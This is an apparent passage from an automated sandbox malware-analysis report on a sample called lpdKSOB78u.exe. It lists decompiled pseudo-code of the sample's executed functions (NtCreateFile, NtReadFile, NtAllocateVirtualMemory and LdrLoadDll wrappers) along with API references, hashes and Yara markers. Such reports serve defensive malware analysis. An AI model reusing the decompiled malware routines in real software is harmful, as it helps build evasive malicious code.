0x00000000
0x00000000
0x70481149
0x7048114c
0x7048119b
0x00000000
0x7048119b
0x7048114f
0x70481150
0x70481183
0x00000000
0x70481183
0x00000000
0x704811ba
0x704811ba
0x00000000
0x704811c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 7048115B
GlobalFree.KERNEL32 ref: 704811B4
GlobalFree.KERNEL32 ref: 704811C7
GlobalFree.KERNEL32 ref: 704811F5

Memory Dump Source

Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true

Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 4971420ee33835e7b2a94fccd3a2673fe79ff6c225ae40302eba5e7345b059a2
Instruction ID: 58957b3c8fd60a6619ae401740a5705dd9c61fd0bf2c2153308f9319eb758a4c
Opcode Fuzzy Hash: 4971420ee33835e7b2a94fccd3a2673fe79ff6c225ae40302eba5e7345b059a2
Instruction Fuzzy Hash: 643181B2504244AFD7019F69DD49B2E7FFCEB4A244F240D6FEA46D63F4DA7898018B11

Uniqueness

Uniqueness Score: -1.00%

Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d5b
0x00405d5d
0x00405d60
0x00405d8c
0x00405d65
0x00405d6e
0x00405d73
0x00405d7e
0x00405d81
0x00405d9d
0x00405d83
0x00405d8a
0x00000000
0x00405d8a
0x00405d96
0x00405d9a
0x00405d9a
0x00405d94
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lpdKSOB78u.exe PID: 5652 Parent PID: 6076 lpdKSOB78u.exeCOMMON

Executed Functions

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041825A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: e1268d1d13aa14866ec5fc9901a730ad66f9bcd5069cb30f9be6d9970bbefc6c
Instruction ID: 1484faaf3d123641ce807f159fcb9d865f870cdb077d6852328bcb0df488e4e3
Opcode Fuzzy Hash: e1268d1d13aa14866ec5fc9901a730ad66f9bcd5069cb30f9be6d9970bbefc6c
Instruction Fuzzy Hash: E5F01DB6210144AFCB04DFA9D880CEB7BADBF8D218B15835DFE5C97252C630E855CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181AA, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004181AA(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("cmc");
				 *0x55e8dfb4 =  *0x55e8dfb4 + 0x8b;
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181aa
0x004181ab
0x004181b3
0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5329f2889c0faf2d7b06cba2bc1cfff50958c0534a6a266dcddd042ab4cdd5dd
Instruction ID: b3099a9442be8ac3c311f73c3061f49903642779ba4c4215955791e8b671904c
Opcode Fuzzy Hash: 5329f2889c0faf2d7b06cba2bc1cfff50958c0534a6a266dcddd042ab4cdd5dd
Instruction Fuzzy Hash: F701C9B2215108AFCB48CF98DC95DEB77A9AF8C354F15824CFA5DD7291C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004182DA(void* __ebx, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t13;

				asm("adc [ebx+0x556fefef], esp");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182db
0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 06248f8ea0de34a5af732b1c0ee2a8feef5fd12f18ba670cac1c28878d5babf3
Instruction ID: 5f51529947ee7be49ce6f7e9e99f00dbcfd4cf5c0cbd7c544e2ac80e8fbb4815
Opcode Fuzzy Hash: 06248f8ea0de34a5af732b1c0ee2a8feef5fd12f18ba670cac1c28878d5babf3
Instruction Fuzzy Hash: 59E08C32600314ABDB10EF98CC85ED73B68EF48720F04419EBE085B242C530F91086D0

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 009D98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D98FA

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9929570f44b94a5997d94c455cd55dbca2e1f55d96bd6b0debba7ac687f089d6
Instruction ID: 445facb986a2f520f51a8d74efbbc4a3b9cb1c1489090bb057fefebd8086fd0b
Opcode Fuzzy Hash: 9929570f44b94a5997d94c455cd55dbca2e1f55d96bd6b0debba7ac687f089d6
Instruction Fuzzy Hash: 7190026160214502D212715A4404626014A97D03C1FA1C032A5414555ECA658D92F171

Uniqueness

Uniqueness Score: -1.00%

Function 009D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D984A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d03e9ea9d89475e12821bbfedc62d423a9587d05aaa510d4cc6cfd33e0a2d83
Instruction ID: 6142828fcdb57620ab813f540c5815817b0339caa671401b538dc9b302161d2b
Opcode Fuzzy Hash: 3d03e9ea9d89475e12821bbfedc62d423a9587d05aaa510d4cc6cfd33e0a2d83
Instruction Fuzzy Hash: F6900261243181525656B15A44045174146A7E03C17A1C022A5804950C85669C56E661

Uniqueness

Uniqueness Score: -1.00%

Function 009D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D986A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a5c3c5fb83c340264e8a2749d409466b59757b8f865ffd1de783ca5882f8736c
Instruction ID: cdab4a80da995d5d55f15801f27728e56c2a04b920f57b73aeaea20eda2c497b
Opcode Fuzzy Hash: a5c3c5fb83c340264e8a2749d409466b59757b8f865ffd1de783ca5882f8736c
Instruction Fuzzy Hash: BC90027120214413D222615A4504717014997D03C1FA1C422A4814558D96968D52F161

Uniqueness

Uniqueness Score: -1.00%

Function 009D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D99AA

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7221d03adcf8fa9275e732511a6bdb18b367290d0653048d4b521d889f35cdb6
Instruction ID: 11615873bd16ddf5dda828ff216455686b2802861c940ced4c426d165785dd76
Opcode Fuzzy Hash: 7221d03adcf8fa9275e732511a6bdb18b367290d0653048d4b521d889f35cdb6
Instruction Fuzzy Hash: AE9002A134214442D211615A4414B160145D7E1381F61C025E5454554D8659CC52B166

Uniqueness

Uniqueness Score: -1.00%

Function 009D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D95DA

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3c958d1af671782818f1459c7e96068da3c429b2d8af3a3c2efc5217cb11229
Instruction ID: cd6353a9184fd0d4c1909e8806bc8c8d80c7d579205702b3020fbc3cb88a2165
Opcode Fuzzy Hash: f3c958d1af671782818f1459c7e96068da3c429b2d8af3a3c2efc5217cb11229
Instruction Fuzzy Hash: AA9002A1203140034216715A4414626414A97E0381B61C031E5404590DC5658C91B165

Uniqueness

Uniqueness Score: -1.00%

Function 009D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D991A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e46b9ef570646658698910fda7cc89bbcba169f30200da490d514e196f6a162e
Instruction ID: b91703a6ea94d2ccbf01ee6136075539854d8a9d004294342047ad70726b1fcc
Opcode Fuzzy Hash: e46b9ef570646658698910fda7cc89bbcba169f30200da490d514e196f6a162e
Instruction Fuzzy Hash: 889002B120214402D251715A4404756014597D0381F61C021A9454554E86998DD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 009D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D954A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7494e54c30829b43bce3e5213e9ff2b6ad68b97625febf30887bfc18599e60a1
Instruction ID: efa96e69cabf8cc8eaadea2d4bc88709414f1a357f3dbc1151df98fc36b81c83
Opcode Fuzzy Hash: 7494e54c30829b43bce3e5213e9ff2b6ad68b97625febf30887bfc18599e60a1
Instruction Fuzzy Hash: 0A900265212140030216A55A0704517018697D53D1361C031F5405550CD6618C61A161

Uniqueness

Uniqueness Score: -1.00%

Function 009D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D96EA

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f153f644145002a3d5e6c2e6e74f0c6f1b7399b431631d45856c17bcb576bd5
Instruction ID: a4072fa7c2a06fd42aa3f3062966daecf006aeb0f24484ee1ed6bb0ce0ac9139
Opcode Fuzzy Hash: 4f153f644145002a3d5e6c2e6e74f0c6f1b7399b431631d45856c17bcb576bd5
Instruction Fuzzy Hash: 919002712021C802D221615A840475A014597D0381F65C421A8814658D86D58C91B161

Uniqueness

Uniqueness Score: -1.00%

Function 009D9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D9A0A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae5b56c32101b6a1807ce74ba4d1036b65504555d4642151937106ac2af896b9
Instruction ID: 54f554461907a1b40e9c6ea4ef42a979e92d9ae559ddb3623480e5638c7fe3d3
Opcode Fuzzy Hash: ae5b56c32101b6a1807ce74ba4d1036b65504555d4642151937106ac2af896b9
Instruction Fuzzy Hash: 2190027120254402D211615A481471B014597D0382F61C021A5554555D86658C51B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 009D9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D9A2A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cb236c683977411b765c4bbb5d86f8c7745a49528f4d315977312bb2da48bec
Instruction ID: 489867252eb4ee21fd2646d54d157d8a7832fc5165213b39e29a78e55b8a34fd
Opcode Fuzzy Hash: 1cb236c683977411b765c4bbb5d86f8c7745a49528f4d315977312bb2da48bec
Instruction Fuzzy Hash: E8900261602140424251716A88449164145BBE1391761C131A4D88550D85998C65A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 009D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D9A5A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e2a2f96ad9dbf204974afc5a9852d73caa3e0cb07c5a3b15c059ce96a603fed
Instruction ID: 1d1f3b9396c7960c936c81e6448624fb28ee09ee0915e69fc1eafd72231d921f
Opcode Fuzzy Hash: 8e2a2f96ad9dbf204974afc5a9852d73caa3e0cb07c5a3b15c059ce96a603fed
Instruction Fuzzy Hash: C990026121294042D311656A4C14B17014597D0383F61C125A4544554CC9558C61A561

Uniqueness

Uniqueness Score: -1.00%

Function 009D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D966A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7769a3ea56028e6486e053ca8246d153c3804086064b1dd26ab4dc4fdb480dc9
Instruction ID: 5b1a9d08da96403a859ca00bd18e776093ba46e9de11aa41d6c8f9c4969abc1c
Opcode Fuzzy Hash: 7769a3ea56028e6486e053ca8246d153c3804086064b1dd26ab4dc4fdb480dc9
Instruction Fuzzy Hash: E690027120214802D291715A440465A014597D1381FA1C025A4415654DCA558E59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 009D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D978A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea6bc450975b582a717bc9bfc6265dcb9f5a50ad129d7fdac8c4605127b67233
Instruction ID: 45582046fb79f945afbbc8c96c433cb19f9b5dfadc2d0c99dc4049a6e7893d78
Opcode Fuzzy Hash: ea6bc450975b582a717bc9bfc6265dcb9f5a50ad129d7fdac8c4605127b67233
Instruction Fuzzy Hash: 2690026921314002D291715A540861A014597D1382FA1D425A4405558CC9558C69A361

Uniqueness

Uniqueness Score: -1.00%

Function 009D97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D97AA

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 53cd5be38f08f4763cacc72dc117d26068906dbb4cbd5c9129364a294ab5c61a
Instruction ID: 360a39a530cc17e891849e0dfed9d03aa3db1ccb777c2c37dbba7641f40c27db
Opcode Fuzzy Hash: 53cd5be38f08f4763cacc72dc117d26068906dbb4cbd5c9129364a294ab5c61a
Instruction Fuzzy Hash: AF90026130214003D251715A54186164145E7E1381F61D021E4804554CD9558C56A262

Uniqueness

Uniqueness Score: -1.00%

Function 009D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D9FEA

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c149a4399cfb4aa6807cdb946698615939ac1ab3ca59fd0650d63f470feffcb
Instruction ID: 9581703b5f5982d9255041883ba356ec96cab8698b33e7564656b8d485a5ecd3
Opcode Fuzzy Hash: 2c149a4399cfb4aa6807cdb946698615939ac1ab3ca59fd0650d63f470feffcb
Instruction Fuzzy Hash: 4490027131228402D221615A8404716014597D1381F61C421A4C14558D86D58C91B162

Uniqueness

Uniqueness Score: -1.00%

Function 009D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D971A

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a37d7f4a2bd6e126770f94e87872fbe5b3ff73f4c2452d43913f1094de6450a
Instruction ID: 2c0d1962828aec989f00ba7c0cc82937bda5d666fffb33493e94dde5c44c710d
